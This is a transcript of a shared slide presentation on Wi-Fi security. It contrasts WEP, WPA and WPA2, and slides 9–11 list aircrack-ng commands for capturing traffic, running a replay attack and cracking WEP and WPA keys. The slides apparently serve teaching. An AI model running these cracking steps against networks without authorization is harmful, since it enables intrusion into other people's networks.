Presentation is loading. Please wait.

Presentation is loading. Please wait.

OSA vs WEP WPA and WPA II Tools for hacking

Published byRafe O’Brien’ Modified over 6 years ago

Similar presentations

Presentation on theme: "OSA vs WEP WPA and WPA II Tools for hacking"— Presentation transcript:

1 OSA vs WEP WPA and WPA II Tools for hacking
Wireless Security OSA vs WEP WPA and WPA II Tools for hacking

2 OSA vs SKA (1997) Open System Association | Shared Key Auth
OSA: Complete Free-for-all – no auth at all SKA: Used WEP for Authentication Wireless Equivalent Protocol

3 WEP and why it sucks Streaming Algorithm
RC4 – stream cipher in synchronous mode Need to keep sync at all times (wireless is bad at that) Per-packet master key re-use Every single packet sent holds the RC4 hash More exposure = more vulnerability Limited AP keys WEP only allows 1-4 secret keys so every AP on the network has to share them

4 WEP and why it sucks (cont.)
No AP to client auth MITM attacks are easy Confidentiality Vulnerabilities in header Headers aren't verified by Integrity Checker Makes Redirection Attacks easy Integrity Checker is basically garbage No sequence numbers or timestamps Replay attacks are easy and effective

5 WPA (2003) Attempt to re-engineer WEP while using hardware already available Movements towards standardization 802.11i – group for increased security WiFi Alliance – standardization between vendors

6 Improvements on WEP WPA Improvements
Integrity checker allowed for 56 bits (stronger keys) Passwords sent per session, not per packet Auth built on 802.1X framework and TKIP Packet sequence numbers (no replay attacks) Integrity checker for header and payload (no redirection attacks)

7 Improvements on WPA WPA2 (2004) Transition to AES instead of RC4
Way stronger in general Revamped Integrity Checking Leverage AES and better hardware CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) (wtf) Basically encrypted encapsulation More secure key establishment and auth

8 Aircrack-ng Suite of tools for assessing WiFi network security ™
Monitoring (packet capturing and processing) Attacking (replay attacks, deauths, fake AP, etc) Testing Cracking (WEP and WPA PSK I+II)

9 Using it to break WEP iwconfig – check for wireless capabilities
airmon-ng start wlan0 Set your wireless card to monitor mode airodump-ng mon0 Start monitoring for crazy stuff in the air Searching for AP's (John's iPhone) Airodump-ng –bssid “mac” -c “channel” -w WEPCrack mon0

10 Using it to break WEP Open a different terminal
aireplay-ng -3 -b 'AP_mac' -h 'host_mac' mon0 Initiate a replay attack Looking for about 15k+ #Data aircrack-ng WEPcrack-01.cap Cracking Just wait for it and hope basically

11 Using it to crack WPA Basically the same method besides the last part
WPA is strong enough that you have to bruteforce the pcap instead of doing analysis oclHashcat > Aircrack-ng because of rainbow tables and rule based cracking 5 minutes vs 2 hours

Download ppt "OSA vs WEP WPA and WPA II Tools for hacking"

Similar presentations

1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).

1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).
Crack WEP Lab Last Update 2014.08.12 1.1.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Wireless Cracking By: Christopher Zacky.

Wireless Cracking By: Christopher Zacky.
IEEE 802.11i IT443 Broadband Communications Philip MacCabe October 5, 2005

IEEE i IT443 Broadband Communications Philip MacCabe October 5, 2005
CSE 6590 1.  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in 802.11  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 

CSE  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 
WLAN Security: Cracking WEP/WPA

WLAN Security: Cracking WEP/WPA
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.

Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
Wireless Security Ryan Hayles Jonathan Hawes. Introduction  WEP –Protocol Basics –Vulnerability –Attacks –Video  WPA –Overview –Key Hierarchy –Encryption/Decryption.

Wireless Security Ryan Hayles Jonathan Hawes. Introduction  WEP –Protocol Basics –Vulnerability –Attacks –Video  WPA –Overview –Key Hierarchy –Encryption/Decryption.
1 MD5 Cracking One way hash. Used in online passwords and file verification.

1 MD5 Cracking One way hash. Used in online passwords and file verification.
WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.

WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.
Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.

Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.
1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID 001790660.

1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID
W i reless LAN Security Presented by: Pallavi Priyadarshini Student ID 003503527.

W i reless LAN Security Presented by: Pallavi Priyadarshini Student ID
Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP)
Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.

Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.
E-mail: kemal@cs.siu.edu Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture 9: IEEE 802.11.

Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture 9: IEEE
15 November 2004 1 Wireless Security Issues Cheyenne Hollow Horn SFS Presentation 2004.

15 November Wireless Security Issues Cheyenne Hollow Horn SFS Presentation 2004.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
WPA2 By Winway Pang. Overview  What is WPA2?  Wi-Fi Protected Access 2  Introduced September 2004  Two Versions  Enterprise – Server Authentication.

WPA2 By Winway Pang. Overview  What is WPA2?  Wi-Fi Protected Access 2  Introduced September 2004  Two Versions  Enterprise – Server Authentication.
Wireless Security Issues David E. Hudak, Ph.D. Senior Software Architect Karlnet, Inc.

Wireless Security Issues David E. Hudak, Ph.D. Senior Software Architect Karlnet, Inc.

Similar presentations

Ads by Google